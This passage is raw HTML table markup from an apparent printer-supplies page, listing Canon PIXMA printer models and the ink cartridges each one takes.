MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td 